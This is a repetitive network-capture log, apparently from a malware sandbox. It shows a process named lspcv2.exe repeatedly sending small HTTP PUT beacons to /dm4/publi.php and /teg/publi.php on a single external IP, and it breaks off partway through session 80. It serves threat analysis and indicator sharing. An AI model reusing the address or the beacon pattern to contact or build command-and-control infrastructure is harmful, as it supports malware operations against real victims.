Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.4 | 49975 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:08.249887943 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:08.254894018 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:09.141422033 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:08 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.4 | 49976 | 94.241.141.101 | 80 | 3220 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:08.343744040 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:08.348834991 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:09.228753090 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:09 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.4 | 49980 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:09.011648893 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:09.018008947 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:09.908354044 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:09 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.4 | 49983 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:09.266210079 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:09.271433115 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:10.168386936 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:10 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.4 | 49984 | 94.241.141.101 | 80 | 3220 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:09.346347094 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:09.354016066 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:10.252228022 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:10 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.4 | 49990 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:10.026730061 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:10.031563044 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:10.929128885 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:10 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.4 | 49991 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:10.297317982 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:10.302241087 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:11.185817957 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:11 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.4 | 49992 | 94.241.141.101 | 80 | 3220 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:10.391375065 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:10.396405935 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:11.292045116 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:11 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.4 | 49997 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:11.044303894 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:11.050005913 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:11.928544998 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:11 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.4 | 49999 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:11.312300920 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:11.317501068 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:12.201836109 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:12 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.4 | 50001 | 94.241.141.101 | 80 | 3220 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:11.409269094 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:11.418148041 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:12.303128004 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:12 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.4 | 50004 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:12.042726994 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:12.048324108 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:12.960232019 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:12 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.4 | 50006 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:12.330305099 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:12.336875916 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:13.223481894 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:13 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.4 | 50008 | 94.241.141.101 | 80 | 3220 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:12.424140930 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:12.430042028 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:13.313218117 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:13 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.4 | 50012 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:13.075068951 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:13.080121994 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:13.975619078 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:13 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.4 | 50015 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:13.346204996 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:13.351130009 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:14.232203960 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:14 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.4 | 50017 | 94.241.141.101 | 80 | 3220 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:13.437625885 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:13.442596912 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:14.320833921 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:14 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.4 | 50021 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:14.094233990 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:14.101937056 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:14.973814964 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:14 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.4 | 50024 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:14.358783007 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:14.367480040 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:15.265748024 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:15 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.4 | 50025 | 94.241.141.101 | 80 | 3220 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:14.441220045 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:14.447587967 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:15.325099945 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:15 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.4 | 50030 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:15.084836960 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:15.089785099 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:15.969883919 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:15 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.4 | 50032 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:15.389578104 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:15.394448042 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:16.278683901 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:16 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID: 72 | Source IP: 192.168.2.4 | Source Port: 50035 | Destination IP: 94.241.141.101 | Destination Port: 80 | PID: 3220 | Process: C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:15.452912092 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:15.458636045 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:16.334810019 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:16 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID: 73 | Source IP: 192.168.2.4 | Source Port: 50038 | Destination IP: 94.241.141.101 | Destination Port: 80 | PID: 7912 | Process: C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:16.088884115 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:16.093806982 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:16.980257988 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:16 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID: 74 | Source IP: 192.168.2.4 | Source Port: 50042 | Destination IP: 94.241.141.101 | Destination Port: 80 | PID: 4020 | Process: C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:16.406286001 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:16.414052010 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:17.305704117 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:17 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID: 75 | Source IP: 192.168.2.4 | Source Port: 50043 | Destination IP: 94.241.141.101 | Destination Port: 80 | PID: 3220 | Process: C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:16.455104113 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:16.465590954 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:17.359330893 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:17 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID: 76 | Source IP: 192.168.2.4 | Source Port: 50047 | Destination IP: 94.241.141.101 | Destination Port: 80 | PID: 7912 | Process: C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:17.104305983 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:17.109183073 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:17.985040903 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:17 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID: 77 | Source IP: 192.168.2.4 | Source Port: 50050 | Destination IP: 94.241.141.101 | Destination Port: 80 | PID: 4020 | Process: C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:17.426950932 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:17.431871891 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:18.330624104 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:18 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID: 78 | Source IP: 192.168.2.4 | Source Port: 50051 | Destination IP: 94.241.141.101 | Destination Port: 80 | PID: 3220 | Process: C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:17.484289885 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:17.489196062 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:18.380889893 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:18 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID: 79 | Source IP: 192.168.2.4 | Source Port: 50057 | Destination IP: 94.241.141.101 | Destination Port: 80 | PID: 7912 | Process: C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:18.104408979 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:18.109381914 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:18.997750044 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:18 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID: 80 | Source IP: 192.168.2.4 | Source Port: 50058 | Destination IP: 94.241.141.101 | Destination Port: 80 | PID: 4020 | Process: C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:18.459305048 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
